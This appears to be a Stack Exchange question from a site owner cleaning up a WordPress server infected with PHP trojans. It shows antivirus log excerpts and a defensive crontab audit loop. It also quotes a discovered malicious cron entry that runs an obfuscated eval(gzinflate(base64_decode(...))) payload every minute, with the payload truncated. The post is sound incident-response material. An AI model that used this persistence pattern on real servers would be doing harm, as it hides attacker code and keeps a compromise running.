Sample Header Ad - 728x90

Troj/PHPShel-CE and PHP/Agent-BJNA trojan

0 votes
2 answers
82 views
ubuntu apache-httpd php thread wordpress
I'm currently dealing with a real threat: the trojans Troj/PHPShel-CE and PHP/Agent-BJNA showed up on my system. I've decided to move to another provider – the first server IP was already blacklisted, and I want to stop any further damage. As a first step, I disabled apache2 and blocked all incoming/outgoing ports except SSH (port 22). I'm now backing up only the important data (like .pdf, images, etc. – no .php, .exe, .com or anything executable). But I'm still confused why Sophos didn’t detect the full extent of the infection. Here's what it found: Severity,When,Event,User,"User Groups",Device,"Device Groups","IP Address" Low,"2025-05-30T22:51:14+02:00","Scan 'Scan Now' completed",n/a,,mail,,xx.xx.xx.xx High,"2025-05-30T22:39:03+02:00","Outbreak detected",n/a,,mail,,xx.xx.xx.xx Medium,"2025-05-30T22:39:02+02:00","Malware detected: 'Troj/PHPShel-CE' at '/var/www/clients/client1/web7/web/wp-includes/l10n/class-wp-translation-file-security.php'",n/a,,mail,,xx.xx.xx.xx Low,"2025-05-30T22:38:45+02:00","Malware cleaned up: 'PHP/Agent-BJNA' at '/var/www/clients/client1/web3/web/wp-content/plugins/wpforms-lite/vendor_prefixed/apimatic/jsonmapper/tests/namespacetest/model/.1748559585'",n/a,,mail,,xx.xx.xx.xx more... about 150 times... After scanning multiple times, some of the same files were detected again – so clearly something is still active. I chatted with Claude (AI assistant), and he suggested checking all user crontabs, using this: echo "Checking crontabs..." for user in $(cut -f1 -d: /etc/passwd); do echo "--- Crontab for $user ---" crontab -u "$user" -l 2>/dev/null || echo "No crontab for $user" done At first, nothing suspicious came up – but then I found something under a user called web10: root@mail:/usr/local/sbin# crontab -u web10 -l * * * * * /usr/bin/php -r 'eval(gzinflate(base64_decode("jVJtj5pAEP7**** LOT MORE ****=="))); ###### My question: When we move to a new (managed) hosting provider, is there a risk that some infected files could sneak into the new system during the migration – even if we’re careful and avoid transferring obvious malware like .php and .exe files? ###### My setup: Ubuntu 24.04.2, apache2, php 8.3/8.4, ispconfig3
Asked by Harvey68 (1 rep)
Jun 1, 2025, 09:23 AM
Last activity: Jun 3, 2025, 08:44 AM
Sidebar Ad - 300x250
Related Questions

Browse more questions from Unix & Linux Stack Exchange

More questions tagged "ubuntu"
More questions tagged "apache-httpd"
More questions tagged "php"
Footer Ad - 728x90